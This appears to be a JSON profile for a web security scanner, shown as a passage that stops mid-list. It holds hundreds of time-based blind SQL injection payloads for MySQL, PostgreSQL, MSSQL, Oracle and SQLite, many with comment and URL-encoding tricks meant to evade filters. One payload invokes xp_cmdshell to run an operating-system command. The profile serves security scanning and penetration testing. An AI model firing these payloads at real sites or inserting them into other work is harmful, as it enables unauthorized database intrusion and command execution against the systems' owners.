[
  {
    "ProfileName": "BlindSQLi-TimeBased",
    "Name": "",
    "Enabled": false,
    "Scanner": 1,
    "Author": "@egarme",
    "Payloads": [
      "true,\u0027 and sleep 12--",
      "true,\u0027 and sleep 12",
      "true,\u0027 and sleep 12 and \u00271\u0027\u003d\u00271",
      "true,\u0027 and sleep(12) and \u00271\u0027\u003d\u00271",
      "true,\u0027 and sleep(12)--",
      "true,\u0027 and sleep(12)",
      "true,;sleep(12)--",
      "true,\u0027 SELECT BENCHMARK(1200000,MD5(\u0027A\u0027));",
      "true,\u0027 SELECT SLEEP(12); #",
      "true,\u0027 WAITFOR DELAY \u00270:0:12\u0027--",
      "true,\u0027 WAITFOR DELAY \u00270:0:12\u0027",
      "true,\u0027 SELECT pg_sleep(12);",
      "true,\u0027+(/*!50000SELEcT*/+/*!50000sLeEP(12)*/)+\u0027",
      "true,\u0027/**/AnD/**/\"1\"\u003d\"1\"/**/aNd/**/(SeLeCt/**/SlEeP(12))#",
      "true,\u0027||(/*!benchMark(9e6,MD5(0x41))*/)+\u0027",
      "true,\u0027 XOR (IF(1\u003d1,SLEEP(12),0)--%20",
      "true,\u0027%0A%09UNION%0A%0DSELECT%0ASLEEP(12),2,3--%0A",
      "true,\u0027 AND (SELECT * FROM (SELECT(SLEEP(12)))a)--+",
      "true,\u0027%23%0aunion%23!select%23%0dSleep(12)",
      "true,\u0027/*!50000OrDER*/+By+1+AND+(SELECT+1+FROM+(SELECT+SLEEP(12))a)",
      "true,\u0027%0bAnD%0b\"1\"\u003d\"1\"%0bAnD%0b(SELECT%0bSLEEP(12))",
      "true,\u0027 AND 1\u003dIF(2\u003e1,SLEEP(12),0)--",
      "true,\u0027 AND (MID(VERSION(),1,1)\u003d\u00275\u0027 AND SLEEP(12))--",
      "true,\u0027 AND RLIKE(SLEEP(12))--",
      "true,\u0027%0A%0D/**//*!12345UNION*//**/%0A%0DSELECT SLEEP(12)--",
      "true,\u0027 AND (SELECT 1 FROM (SELECT SLEEP(12))a WHERE 1\u003d1)--",
      "true,\u0027/*!50000UNION*//*!50000SELECT*//*!SLEEP(12)*/",
      "true,\u0027 AND (SELECT 1 FROM DUAL WHERE SLEEP(12))--",
      "true,\u0027||(SELECT SLEEP(12) FROM DUAL WHERE 1\u003d1)--",
      "true,\u0027 AND (SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS WHERE SLEEP(12))--",
      "true,\u0027 AND EXP(~(SELECT * FROM (SELECT SLEEP(12))a))--",
      "true,\u0027%09AND%09SLEEP(12)%23",
      "true,\u0027 AND (SELECT 1 FROM (SELECT BENCHMARK(9e6,MD5(\u0027x\u0027)))a)--",
      "true,\u0027 OR (SELECT 1 FROM (SELECT SLEEP(12))a)||\u00271\u0027\u003d\u00271",
      "true,\u0027%0A/*!UNION*//*!SELECT SLEEP(12),2,3*/--",
      "true,\u0027 AND (SELECT 1 FROM (SELECT GET_LOCK(\u0027x\u0027,12))a)--",
      "true,\u0027 XOR (SELECT SLEEP(12) FROM DUAL) XOR \u0027",
      "true,\u0027 AND (SELECT 1 FROM (SELECT SLEEP(12))a HAVING 1\u003d1)--",
      "true,\u0027/**/OR/**/SLEEP(12)/**/OR/**/\u00271\u0027\u003d\u00272",
      "true,\u0027 AND (SELECT 1 FROM (SELECT SLEEP(12))a GROUP BY 1)--",
      "true,\u0027||(SELECT 1 FROM DUAL WHERE SLEEP(12))||\u0027",
      "true,\u0027 AND (SELECT @@VERSION WHERE SLEEP(12))--",
      "true,\u0027||(SELECT/**/PG_SLEEP(12)::text)||\u0027",
      "true,\u0027 AND (SELECT CASE WHEN (1\u003d1) THEN PG_SLEEP(12) ELSE NULL END)--",
      "true,\u0027%0AUNION%0ASELECT%0APG_SLEEP(12),2--",
      "true,\u0027||(SELECT/*delay*/PG_SLEEP(12))--",
      "true,\u0027 AND (SELECT 1 FROM GENERATE_SERIES(1,1000000) WHERE 1\u003d1)--",
      "true,\u0027/*!99999PG_SLEEP*/(12)--",
      "true,\u0027%0AOR%0AEXTRACT(EPOCH%0AFROM%0APG_SLEEP(12))--",
      "true,\u0027 AND (SELECT COUNT(*) FROM PG_LARGEOBJECT WHERE LOID\u003d1 AND PG_SLEEP(12))--",
      "true,\u0027||(SELECT/**/CASE/**/WHEN/**/1\u003d1/**/THEN/**/PG_SLEEP(12)/**/END)--",
      "true,\u0027 AND (SELECT 1 FROM PG_STAT_ACTIVITY WHERE PG_SLEEP(12))--",
      "true,\u0027%23%0ASELECT%23%0APG_SLEEP(12)",
      "true,\u0027||(SELECT/*!12345PG_SLEEP(12)*/)",
      "true,\u0027 AND (SELECT 1 FROM PG_TIMEZONE_NAMES WHERE PG_SLEEP(12))--",
      "true,\u0027/**/AND/**/PG_SLEEP(12)/**/AND/**/\u00271\u0027\u003d\u00271",
      "true,\u0027||(SELECT PG_SLEEP(12)||\u0027x\u0027)--",
      "true,\u0027 AND (SELECT 1 FROM PG_AM WHERE PG_SLEEP(12))--",
      "true,\u0027%0AORDER%0ABY%0A1%0AAND%0APG_SLEEP(12)--",
      "true,\u0027 OR (SELECT PG_SLEEP(12) FROM PG_CAST)--",
      "true,\u0027||(SELECT/*!12345PG_SLEEP*/(12))--",
      "true,\u0027 AND (SELECT 1 FROM PG_DATABASE WHERE PG_SLEEP(12))--",
      "true,\u0027; WAITFOR DELAY \u00270:0:12\u0027--",
      "true,\u0027%0A;EXEC(\u0027WAITFOR DELAY \u0027\u00270:0:12\u0027\u0027\u0027)--",
      "true,\u0027 AND (SELECT 123 FROM (SELECT WAITFOR DELAY \u00270:0:12\u0027)a)--",
      "true,\u0027%0D%0A;WAITFOR%0D%0ADELAY%0D%0A\u00270:0:12\u0027--",
      "true,\u0027/**/OR/**/1\u003dWAITFOR/**/DELAY/**/\u00270:0:12\u0027--",
      "true,\u0027||(WAITFOR DELAY \u00270:0:12\u0027)||\u0027",
      "true,\u0027; DECLARE @v VARCHAR(8000); SET @v\u003d(SELECT WAITFOR DELAY \u00270:0:12\u0027);--",
      "true,\u0027 AND (SELECT 1 FROM SYSOBJECTS WHERE WAITFOR DELAY \u00270:0:12\u0027)--",
      "true,\u0027%0A;EXEC%0Amaster..xp_cmdshell%0A\u0027ping 127.0.0.1 -n 12\u0027--",
      "true,\u0027 AND (SELECT 1 FROM (SELECT WAITFOR DELAY \u00270:0:12\u0027)a HAVING 1\u003d1)--",
      "true,\u0027%23%0AWAITFOR%23%0ADELAY%23%0A\u00270:0:12\u0027--",
      "true,\u0027 OR (SELECT 1 FROM SYSUSERS WHERE WAITFOR DELAY \u00270:0:12\u0027)--",
      "true,\u0027||(SELECT TOP 1 WAITFOR DELAY \u00270:0:12\u0027 FROM SYSCOLUMNS)--",
      "true,\u0027; BEGIN WAITFOR DELAY \u00270:0:12\u0027; END--",
      "true,\u0027 AND (SELECT 1 FROM (SELECT WAITFOR DELAY \u00270:0:12\u0027)a GROUP BY 1)--",
      "true,\u0027%0BWAITFOR%0BDELAY%0B\u00270:0:12\u0027--",
      "true,\u0027 AND (SELECT 1 FROM (SELECT WAITFOR DELAY \u00270:0:12\u0027)a WHERE 1\u003d1)--",
      "true,\u0027 OR (SELECT 1 FROM (SELECT WAITFOR DELAY \u00270:0:12\u0027)a)--",
      "true,\u0027; IF 1\u003d1 WAITFOR DELAY \u00270:0:12\u0027--",
      "true,\u0027%0A;EXEC%0Amaster..sp_executesql%0AN\u0027WAITFOR DELAY \u0027\u00270:0:12\u0027\u0027\u0027",
      "true,\u0027 AND (SELECT 1 FROM SYSINDEXES WHERE WAITFOR DELAY \u00270:0:12\u0027)--",
      "true,\u0027||(SELECT 1 FROM (SELECT WAITFOR DELAY \u00270:0:12\u0027)a)--",
      "true,\u0027%09;WAITFOR%09DELAY%09\u00270:0:12\u0027--",
      "true,\u0027 AND (SELECT 1 FROM (SELECT WAITFOR DELAY \u00270:0:12\u0027)a HAVING 1\u003d1)--",
      "true,\u0027 OR (SELECT 1 FROM SYSCOMMENTS WHERE WAITFOR DELAY \u00270:0:12\u0027)--",
      "true,\u0027||DBMS_PIPE.RECEIVE_MESSAGE(\u0027x\u0027,12)||\u0027",
      "true,\u0027 AND (SELECT 1 FROM DUAL WHERE DBMS_LOCK.SLEEP(12)\u003d1)--",
      "true,\u0027%0AOR%0ADBMS_LOCK.SLEEP(12)\u003d1--",
      "true,\u0027; BEGIN DBMS_LOCK.SLEEP(12); END;--",
      "true,\u0027 AND 123\u003d(SELECT 123 FROM DUAL WHERE DBMS_LOCK.SLEEP(12)\u003d1)--",
      "true,\u0027||(SELECT DBMS_LOCK.SLEEP(12) FROM DUAL)--",
      "true,\u0027%23%0ASELECT%23%0ADBMS_LOCK.SLEEP(12)%23%0AFROM%23%0ADUAL",
      "true,\u0027 AND (SELECT COUNT(*) FROM ALL_TABLES WHERE DBMS_LOCK.SLEEP(12)\u003d1)--",
      "true,\u0027; EXECUTE IMMEDIATE \u0027BEGIN DBMS_LOCK.SLEEP(12); END;\u0027;--",
      "true,\u0027 OR (SELECT 1 FROM DUAL WHERE DBMS_LOCK.SLEEP(12)\u003d1)--",
      "true,\u0027 AND (SELECT 1 FROM (SELECT DBMS_LOCK.SLEEP(12) FROM DUAL)--",
      "true,\u0027%0AUNION%0ASELECT%0ADBMS_LOCK.SLEEP(12),2%0AFROM%0ADUAL--",
      "true,\u0027||(SELECT/*!12345DBMS_LOCK.SLEEP(12)*/FROM DUAL)--",
      "true,\u0027 AND (SELECT 1 FROM ALL_USERS WHERE DBMS_LOCK.SLEEP(12)\u003d1)--",
      "true,\u0027; DBMS_SESSION.SLEEP(12);--",
      "true,\u0027 AND (SELECT 1 FROM (SELECT RANDOMBLOB(100000000))--",
      "true,\u0027 OR (SELECT 1 FROM (SELECT RANDOMBLOB(100000000))--",
      "true,\u0027||(SELECT RANDOMBLOB(100000000))--",
      "true,\u0027 AND (SELECT 1 FROM (SELECT LOAD_EXTENSION(\u0027C:\\delay\u0027))--",
      "true,\u0027; SELECT ABS(RANDOM()%1000000000)--",
      "true,\u0027 AND (SELECT 1 FROM (SELECT sqlite_version(), RANDOMBLOB(100000000)))--",
      "true,\u0027||(SELECT HEX(RANDOMBLOB(100000000)))--",
      "true,\u0027 AND (SELECT 1 FROM SQLITE_MASTER WHERE RANDOMBLOB(100000000))--",
      "true,\u0027%0AUNION%0ASELECT%0ARANDOMBLOB(100000000)--",
      "true,\u0027 OR (SELECT 1 FROM (SELECT RANDOMBLOB(100000000)) WHERE 1\u003d1--",
      "true,sleep(5)#",
      "true,(sleep 5)--",
      "true,(sleep 5)",
      "true,(sleep(5))--",
      "true,(sleep(5))",
      "true,-sleep(5)",
      "true,SLEEP(5)#",
      "true,SLEEP(5)--",
      "true,SLEEP(5)\u003d\"",
      "true,SLEEP(5)\u003d\u0027",
      "true,\";sleep 5--",
      "true,\";sleep 5",
      "true,\";sleep(5)--",
      "true,\";sleep(5)",
      "true,\";SELECT SLEEP(5); #",
      "true,1 SELECT SLEEP(5); #",
      "true,+ SLEEP(5) + \u0027",
      "true,\u0026\u0026SLEEP(5)",
      "true,\u0026\u0026SLEEP(5)--",
      "true,\u0026\u0026SLEEP(5)#",
      "true,;sleep 5--",
      "true,;sleep 5",
      "true,;sleep(5)--",
      "true,;sleep(5)",
      "true,;SELECT SLEEP(5); #",
      "true,\u0027\u0026\u0026SLEEP(5)\u0026\u0026\u00271",
      "true,\u0027 SELECT SLEEP(5); #",
      "true,benchmark(50000000,MD5(1))",
      "true,benchmark(50000000,MD5(1))--",
      "true,benchmark(50000000,MD5(1))#",
      "true,or benchmark(50000000,MD5(1))",
      "true,or benchmark(50000000,MD5(1))--",
      "true,or benchmark(50000000,MD5(1))#",
      "true,ORDER BY SLEEP(5)",
      "true,ORDER BY SLEEP(5)--",
      "true,ORDER BY SLEEP(5)#",
      "true,AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337",
      "true,OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337",
      "true,RANDOMBLOB(500000000/2)",
      "true,AND 1337\u003dLIKE(\u0027ABCDEFG\u0027,UPPER(HEX(RANDOMBLOB(500000000/2))))",
      "true,OR 1337\u003dLIKE(\u0027ABCDEFG\u0027,UPPER(HEX(RANDOMBLOB(500000000/2))))",
      "true,RANDOMBLOB(1000000000/2)",
      "true,AND 1337\u003dLIKE(\u0027ABCDEFG\u0027,UPPER(HEX(RANDOMBLOB(1000000000/2))))",
      "true,OR 1337\u003dLIKE(\u0027ABCDEFG\u0027,UPPER(HEX(RANDOMBLOB(1000000000/2))))",
      "true,\";SELECT pg_sleep(5);",
      "true,;SELECT pg_sleep(5);",
      "true,and SELECT pg_sleep(5);",
      "true,1 SELECT pg_sleep(5);",
      "true,or SELECT pg_sleep(5);",
      "true,(SELECT pg_sleep(5))",
      "true,pg_sleep(5)--",
      "true,1 or pg_sleep(5)--",
      "true,\" or pg_sleep(5)--",
      "true,\u0027 or pg_sleep(5)--",
      "true,1) or pg_sleep(5)--",
      "true,\") or pg_sleep(5)--",
      "true,\u0027) or pg_sleep(5)--",
      "true,1)) or pg_sleep(5)--",
      "true,\")) or pg_sleep(5)--",
      "true,\u0027)) or pg_sleep(5)--",
      "true,pg_SLEEP(5)",
      "true,pg_SLEEP(5)--",
      "true,pg_SLEEP(5)#",
      "true,or pg_SLEEP(5)",
      "true,or pg_SLEEP(5)--",
      "true,or pg_SLEEP(5)#",
      "true,\u0027 SELECT pg_sleep(5);",
      "true,1 AND 1337\u003d(SELECT 1337 FROM PG_SLEEP(5))",
      "true,1 AND 1337\u003d(SELECT 1337 FROM PG_SLEEP(5))-- 1337",
      "true,1\u0027 AND 1337\u003d(SELECT 1337 FROM PG_SLEEP(5)) AND \u00271337\u0027\u003d\u00271337",
      "true,1\u0027) AND 1337\u003d(SELECT 1337 FROM PG_SLEEP(5)) AND (\u00271337\u0027\u003d\u00271337",
      "true,1) AND 1337\u003d(SELECT 1337 FROM PG_SLEEP(5)) AND (1337\u003d1337",
      "true,or pg_sleep(5)--",
      "true,) or pg_sleep(5)--",
      "true,)) or pg_sleep(5)--",
      "true,1 AND 1337\u003dDBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5)",
      "true,1 AND 1337\u003dDBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5)-- 1337",
      "true,\u0027 AND 1337\u003dDBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5) AND \u00271337\u0027\u003d\u00271337",
      "true,\u0027) AND 1337\u003dDBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5) AND (\u00271337\u0027\u003d\u00271337",
      "true,) AND 1337\u003dDBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5) AND (1337\u003d1337",
      "true,1 OR 1337\u003dDBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5)",
      "true,1 OR 1337\u003dDBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5)-- 1337",
      "true,\u0027 OR 1337\u003dDBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5) OR \u00271337\u0027\u003d\u00271337",
      "true,\u0027) OR 1337\u003dDBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5) OR (\u00271337\u0027\u003d\u00271337",
      "true,) OR 1337\u003dDBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5) OR (1337\u003d1337",
      "true,;waitfor delay \u00270:0:5\u0027--",
      "true,\u0027;WAITFOR DELAY \u00270:0:5\u0027--",
      "true,);waitfor delay \u00270:0:5\u0027--",
      "true,\u0027;waitfor delay \u00270:0:5\u0027--",
      "true,\";waitfor delay \u00270:0:5\u0027--",
      "true,\u0027);waitfor delay \u00270:0:5\u0027--",
      "true,\");waitfor delay \u00270:0:5\u0027--",
      "true,));waitfor delay \u00270:0:5\u0027--",
      "true,\u0027));waitfor delay \u00270:0:5\u0027--",
      "true,\"));waitfor delay \u00270:0:5\u0027--",
      "true,\") IF (1\u003d1) WAITFOR DELAY \u00270:0:5\u0027--",
      "true,\u0027;%5waitfor%5delay%5\u00270:0:5\u0027%5--%5",
      "true,\u0027 WAITFOR DELAY \u00270:0:5\u0027--",
      "true,\u0027 WAITFOR DELAY \u00270:0:5\u0027",
      "true,or WAITFOR DELAY \u00270:0:5\u0027--",
      "true,or WAITFOR DELAY \u00270:0:5\u0027",
      "true,and WAITFOR DELAY \u00270:0:5\u0027--",
      "true,and WAITFOR DELAY \u00270:0:5\u0027",
      "true,WAITFOR DELAY \u00270:0:5\u0027",
      "true,;WAITFOR DELAY \u00270:0:5\u0027--",
      "true,;WAITFOR DELAY \u00270:0:5\u0027",
      "true,1 WAITFOR DELAY \u00270:0:5\u0027--",
      "true,1 WAITFOR DELAY \u00270:0:5\u0027",
      "true,1 WAITFOR DELAY \u00270:0:5\u0027-- 1337",
      "true,1\u0027 WAITFOR DELAY \u00270:0:5\u0027 AND \u00271337\u0027\u003d\u00271337",
      "true,1\u0027) WAITFOR DELAY \u00270:0:5\u0027 AND (\u00271337\u0027\u003d\u00271337",
      "true,1) WAITFOR DELAY \u00270:0:5\u0027 AND (1337\u003d1337",
      "true,\u0027) WAITFOR DELAY \u00270:0:5\u0027--",
      "true,\" WAITFOR DELAY \u00270:0:5\u0027--",
      "true,\u0027)) WAITFOR DELAY \u00270:0:5\u0027--",
      "true,\u0027))) WAITFOR DELAY \u00270:0:5\u0027--",
      "true,%\u0027 WAITFOR DELAY \u00270:0:5\u0027--",
      "true,\") WAITFOR DELAY \u00270:0:5\u0027--",
      "true,\")) WAITFOR DELAY \u00270:0:5\u0027--",
      "true,\"))) WAITFOR DELAY \u00270:0:5\u0027--",
      "true,1 waitfor delay \u00270:0:5\u0027--",
      "true,1\u0027 waitfor delay \u00270:0:5\u0027--",
      "true,1 OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)",
      "true,1 OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR (1337\u003d1337",
      "true,1 OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337",
      "true,\u0027 OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR \u00271337\u0027\u003d\u00271337",
      "true,\u0027) OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR (\u0027PBiy\u0027\u003d\u0027PBiy",
      "true,) OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337",
      "true,) OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR (1337\u003d1337",
      "true,)) OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR ((1337\u003d1337",
      "true,))) OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR (((1337\u003d1337",
      "true,1 OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)# 1337",
      "true,) WHERE 1337\u003d1337 OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337",
      "true,1 WHERE 1337\u003d1337 OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337",
      "true,+(SELECT 1337 WHERE 1337\u003d1337 OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY))+",
      "true,)) AS 1337 WHERE 1337\u003d1337 OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337",
      "true,) AS 1337 WHERE 1337\u003d1337 OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337",
      "true,` WHERE 1337\u003d1337 OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337",
      "true,`) WHERE 1337\u003d1337 OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337",
      "true,`\u003d`1` OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR `1`\u003d`1",
      "true,]-(SELECT 0 WHERE 1337\u003d1337 OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY))|[1",
      "true,\u0027) OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337",
      "true,\u0027 OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337",
      "true,\" OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337",
      "true,\u0027) OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR (\u00271337\u0027\u003d\u00271337",
      "true,\u0027)) OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR ((\u00271337\u0027\u003d\u00271337",
      "true,\u0027))) OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR (((\u00271337\u0027\u003d\u00271337",
      "true,\u0027 OR (SELECT 3122 FROM (SELECT(SLEEP(5)))YYYY) OR \u00271337\u0027\u003d\u00271337",
      "true,\u0027) OR (SELECT 4796 FROM (SELECT(SLEEP(5)))YYYY) OR (\u00271337\u0027\u003d\u00271337",
      "true,\u0027)) OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR ((\u00271337\u0027 LIKE \u00271337",
      "true,\u0027))) OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR (((\u00271337\u0027 LIKE \u00271337",
      "true,%\u0027 OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR \u00271337%\u0027\u003d\u00271337",
      "true,\u0027 OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR \u00271337\u0027 LIKE \u00271337",
      "true,\") OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR (\"1337\"\u003d\"1337",
      "true,\")) OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR ((\"1337\"\u003d\"1337",
      "true,\"))) OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR (((\"1337\"\u003d\"1337",
      "true,\" OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR \"1337\"\u003d\"1337",
      "true,\") OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR (\"1337\" LIKE \"1337",
      "true,\")) OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR ((\"1337\" LIKE \"1337",
      "true,\"))) OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR (((\"1337\" LIKE \"1337",
      "true,\" OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR \"1337\" LIKE \"1337",
      "true,\u0027 OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR \u00271337\u0027\u003d\u00271337",
      "true,\u0027) WHERE 1337\u003d1337 OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337",
      "true,\") WHERE 1337\u003d1337 OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337",
      "true,RLIKE SLEEP(5)--",
      "true,\u0027 RLIKE SLEEP(5)--",
      "true,\u0027 RLIKE SLEEP(5)-- 1337",
      "true,\" RLIKE SLEEP(5)-- 1337",
      "true,\u0027) RLIKE SLEEP(5)-- 1337",
      "true,\u0027) RLIKE SLEEP(5) OR (\u00271337\u0027\u003d\u00271337",
      "true,\u0027)) RLIKE SLEEP(5) OR ((\u00271337\u0027\u003d\u00271337",
      "true,\u0027))) RLIKE SLEEP(5) OR (((\u00271337\u0027\u003d\u00271337",
      "true,) RLIKE SLEEP(5)-- 1337",
      "true,) RLIKE SLEEP(5) OR (1337\u003d1337",
      "true,)) RLIKE SLEEP(5) OR ((1337\u003d1337",
      "true,))) RLIKE SLEEP(5) OR (((1337\u003d1337",
      "true,1 RLIKE SLEEP(5)",
      "true,1 RLIKE SLEEP(5)-- 1337",
      "true,1 RLIKE SLEEP(5)# 1337",
      "true,) WHERE 1337\u003d1337 RLIKE SLEEP(5)-- 1337",
      "true,1 WHERE 1337\u003d1337 RLIKE SLEEP(5)-- 1337",
      "true,+(SELECT 1337 WHERE 1337\u003d1337 RLIKE SLEEP(5))+",
      "true,)) AS 1337 WHERE 1337\u003d1337 RLIKE SLEEP(5)-- 1337",
      "true,) AS 1337 WHERE 1337\u003d1337 RLIKE SLEEP(5)-- 1337",
      "true,` WHERE 1337\u003d1337 RLIKE SLEEP(5)-- 1337",
      "true,`) WHERE 1337\u003d1337 RLIKE SLEEP(5)-- 1337",
      "true,\u0027 RLIKE SLEEP(5) OR \u00271337\u0027\u003d\u00271337",
      "true,\u0027) RLIKE SLEEP(5) OR (\u00271337\u0027 LIKE \u00271337",
      "true,\u0027)) RLIKE SLEEP(5) OR ((\u00271337\u0027 LIKE \u00271337",
      "true,\u0027))) RLIKE SLEEP(5) OR (((\u00271337\u0027 LIKE \u00271337",
      "true,%\u0027 RLIKE SLEEP(5) OR \u00271337%\u0027\u003d\u00271337",
      "true,\u0027 RLIKE SLEEP(5) OR \u00271337\u0027 LIKE \u00271337",
      "true,\") RLIKE SLEEP(5) OR (\"1337\"\u003d\"1337",
      "true,\")) RLIKE SLEEP(5) OR ((\"1337\"\u003d\"1337",
      "true,\"))) RLIKE SLEEP(5) OR (((\"1337\"\u003d\"1337",
      "true,\" RLIKE SLEEP(5) OR \"1337\"\u003d\"1337",
      "true,\") RLIKE SLEEP(5) OR (\"1337\" LIKE \"1337",
      "true,\")) RLIKE SLEEP(5) OR ((\"1337\" LIKE \"1337",
      "true,\"))) RLIKE SLEEP(5) OR (((\"1337\" LIKE \"1337",
      "true,\" RLIKE SLEEP(5) OR \"1337\" LIKE \"1337",
      "true,\u0027 RLIKE SLEEP(5) OR \u00271337\u0027\u003d\u00271337",
      "true,\u0027) WHERE 1337\u003d1337 RLIKE SLEEP(5)-- 1337",
      "true,\") WHERE 1337\u003d1337 RLIKE SLEEP(5)-- 1337",
      "true,\u0027 WHERE 1337\u003d1337 RLIKE SLEEP(5)-- 1337",
      "true,\" WHERE 1337\u003d1337 RLIKE SLEEP(5)-- 1337",
      "true,\u0027 OR ELT(1337\u003d1337,SLEEP(5))--",
      "true,\u0027 OR ELT(1337\u003d1337,SLEEP(5))-- 1337",
      "true,\" OR ELT(1337\u003d1337,SLEEP(5))-- 1337",
      "true,\u0027) OR ELT(1337\u003d1337,SLEEP(5))-- 1337",
      "true,\u0027) OR ELT(1337\u003d1337,SLEEP(5)) OR (\u00271337\u0027\u003d\u00271337",
      "true,\u0027)) OR ELT(1337\u003d1337,SLEEP(5)) OR ((\u00271337\u0027\u003d\u00271337",
      "true,\u0027))) OR ELT(1337\u003d1337,SLEEP(5)) OR (((\u00271337\u0027\u003d\u00271337",
      "true,\u0027 OR ELT(1337\u003d1337,SLEEP(5)) OR \u00271337\u0027\u003d\u00271337",
      "true,\u0027) OR ELT(1337\u003d1337,SLEEP(5)) OR (\u00271337\u0027 LIKE \u00271337",
      "true,\u0027)) OR ELT(1337\u003d1337,SLEEP(5)) OR ((\u00271337\u0027 LIKE \u00271337",
      "true,\u0027))) OR ELT(1337\u003d1337,SLEEP(5)) OR (((\u00271337\u0027 LIKE \u00271337",
      "true,) OR ELT(1337\u003d1337,SLEEP(5))-- 1337",
      "true,) OR ELT(1337\u003d1337,SLEEP(5)) OR (1337\u003d1337",
      "true,)) OR ELT(1337\u003d1337,SLEEP(5)) OR ((1337\u003d1337",
      "true,))) OR ELT(1337\u003d1337,SLEEP(5)) OR (((1337\u003d1337",
      "true,1 OR ELT(1337\u003d1337,SLEEP(5))",
      "true,1 OR ELT(1337\u003d1337,SLEEP(5))-- 1337",
      "true,1 OR ELT(1337\u003d1337,SLEEP(5))# 1337",
      "true,) WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(5))-- 1337",
      "true,1 WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(5))-- 1337",
      "true,+(SELECT 1337 WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(5)))+",
      "true,)) AS 1337 WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(5))-- 1337",
      "true,) AS 1337 WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(5))-- 1337",
      "true,` WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(5))-- 1337",
      "true,`) WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(5))-- 1337",
      "true,1`\u003d`1` OR ELT(1337\u003d1337,SLEEP(5)) OR `1`\u003d`1",
      "true,]-(SELECT 0 WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(5)))|[1",
      "true,%\u0027 OR ELT(1337\u003d1337,SLEEP(5)) OR \u00271337%\u0027\u003d\u00271337",
      "true,\u0027 OR ELT(1337\u003d1337,SLEEP(5)) OR \u00271337\u0027 LIKE \u00271337",
      "true,\") OR ELT(1337\u003d1337,SLEEP(5)) OR (\"1337\"\u003d\"1337",
      "true,\")) OR ELT(1337\u003d1337,SLEEP(5)) OR ((\"1337\"\u003d\"1337",
      "true,\"))) OR ELT(1337\u003d1337,SLEEP(5)) OR (((\"1337\"\u003d\"1337",
      "true,\" OR ELT(1337\u003d1337,SLEEP(5)) OR \"1337\"\u003d\"1337",
      "true,\") OR ELT(1337\u003d1337,SLEEP(5)) OR (\"1337\" LIKE \"1337",
      "true,\")) OR ELT(1337\u003d1337,SLEEP(5)) OR ((\"1337\" LIKE \"1337",
      "true,\"))) OR ELT(1337\u003d1337,SLEEP(5)) OR (((\"1337\" LIKE \"1337",
